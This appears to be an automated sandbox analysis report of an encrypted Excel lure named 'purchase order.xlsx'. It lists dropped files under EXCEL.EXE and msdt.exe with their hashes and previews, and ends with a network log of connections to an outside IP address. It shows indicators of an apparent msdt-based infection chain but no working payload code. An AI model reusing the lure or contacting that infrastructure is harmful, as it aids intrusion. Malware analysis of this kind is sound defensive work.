SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykaak7YnqqNrPN5Dlq5J:+RI+ycuZhNnakSJPNnqX
MD5:E4A1CF9558A786A84B1619C8E5EDAD75
SHA1:D45ABADD224059F87E1FDF4E2EE2CF16A9DDAA1D
SHA-256:EFDC4288424F961795D5E2C02F93CDD08C0581BA9F6F5A82474732471A4FA216
SHA-512:624668625F58B06B84E82B984E34059F14F6EE4C25AFBCB192A2DFC2338285C79B5872B4F8167695C2659D52E2031342BEC78C8F449C6F58FA3CA176021DFF47
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):5120
Entropy (8bit):3.7814229864516253
Encrypted:false
SSDEEP:48:63oPhmKraYZkH8KTibUyXkwjj0JOC+CFSlwY9c1ulna3rq:1DaAkHHo5k8hCuZlK
MD5:CA38C4E07EE62DF319C8D61BFDB96BCA
SHA1:8840EFA9C96F5793650FDB7EB7396A4910082235
SHA-256:B557E8D652DBB7E83CBE18AF2557802FCD2B435EE30CD052E60D44C77844074E
SHA-512:C8162752A07C0970A9247F389BF5774ED1EFDB73F6319DFED55AAD190E2F6C33E6FB9D487EB9AA616A9C1E5BE1F5D7199A1339A2E9D0483F047DE40860B700B5
Malicious:false
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:CDFV2 Encrypted
Category:dropped
Size (bytes):72696
Entropy (8bit):7.868306503118196
Encrypted:false
SSDEEP:1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
MD5:A8930C1FCD80E9965AE26446AFB717F6
SHA1:0CBF04BF7FC8522AB983F0246357FA70A85EE56B
SHA-256:C02FF7B4D28A259D37A659A6951DBA4EE574562EF5FC3B3A0135640C0370DEE2
SHA-512:EAD35C97BFCCB344ED5837E82E1F648E518C52A1C6C67BD6511E018B4DC2D1364AE1F6B7DDAD69F02E58AA417402327AC3E36F175220C2C6F72FC01D4758B77F
Malicious:false
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):165
                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24702
                                                                                                                                                          Entropy (8bit):4.37978533849437
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                          MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                          SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                          SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                          SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):66560
                                                                                                                                                          Entropy (8bit):6.926109943059805
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                          MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                          SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                          SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                          SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):50242
                                                                                                                                                          Entropy (8bit):4.932919499511673
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                          MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                          SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                          SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                          SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16946
                                                                                                                                                          Entropy (8bit):4.860026903688885
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                          MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                          SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                          SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                          SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):453
                                                                                                                                                          Entropy (8bit):4.983419443697541
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                          MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                          SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                          SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                          SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6650
                                                                                                                                                          Entropy (8bit):3.6751460885012333
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                          MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                          SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                          SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                          SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):3.517898352371806
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                          MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                          SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                          SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                          SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48956
                                                                                                                                                          Entropy (8bit):5.103589775370961
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                          MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                          SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                          SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                          SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.868306503118196
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:purchase order.xlsx
                                                                                                                                                          File size:72696
                                                                                                                                                          MD5:a8930c1fcd80e9965ae26446afb717f6
                                                                                                                                                          SHA1:0cbf04bf7fc8522ab983f0246357fa70a85ee56b
                                                                                                                                                          SHA256:c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
                                                                                                                                                          SHA512:ead35c97bfccb344ed5837e82e1f648e518c52a1c6c67bd6511e018b4dc2d1364ae1f6b7ddad69f02e58aa417402327ac3e36f175220c2c6f72fc01d4758b77f
                                                                                                                                                          SSDEEP:1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
                                                                                                                                                          TLSH:2C63D08237AB691BCC12093CD51142471E780F5869A8697BACC9B30F487D7CFED53AAD
                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                                                                                          Icon Hash:74ecd0d2d6d6d0dc
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 28, 2022 10:45:23.336363077 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.451755047 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.451863050 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.452174902 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.572532892 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572566032 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572590113 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572613955 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572635889 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572658062 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572679996 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572694063 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.572701931 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572726965 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.572750092 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.572783947 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.574032068 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.574116945 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.689332962 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.689361095 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.689382076 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.689399004 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.689419985 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.689430952 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.689441919 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.689459085 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:23.689480066 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:23.689503908 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:45:29.079606056 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:45:29.079698086 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:19.438086033 CEST | 49773 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:19.556322098 CEST | 80 | 49773 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.520191908 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.635241032 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.635344028 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.635595083 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.757875919 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.757917881 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.757942915 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.757967949 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.757992029 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.758012056 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.758013964 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.758039951 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.758063078 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.758064985 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.758090019 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.758090973 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.758115053 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.758147001 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.758224964 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874607086 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874644041 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874670029 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874687910 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874696970 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874725103 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874726057 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874751091 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874774933 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874777079 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874799967 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874809980 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874826908 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874852896 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874854088 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874878883 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874886036 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874903917 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874927044 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.874929905 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874954939 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874958992 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
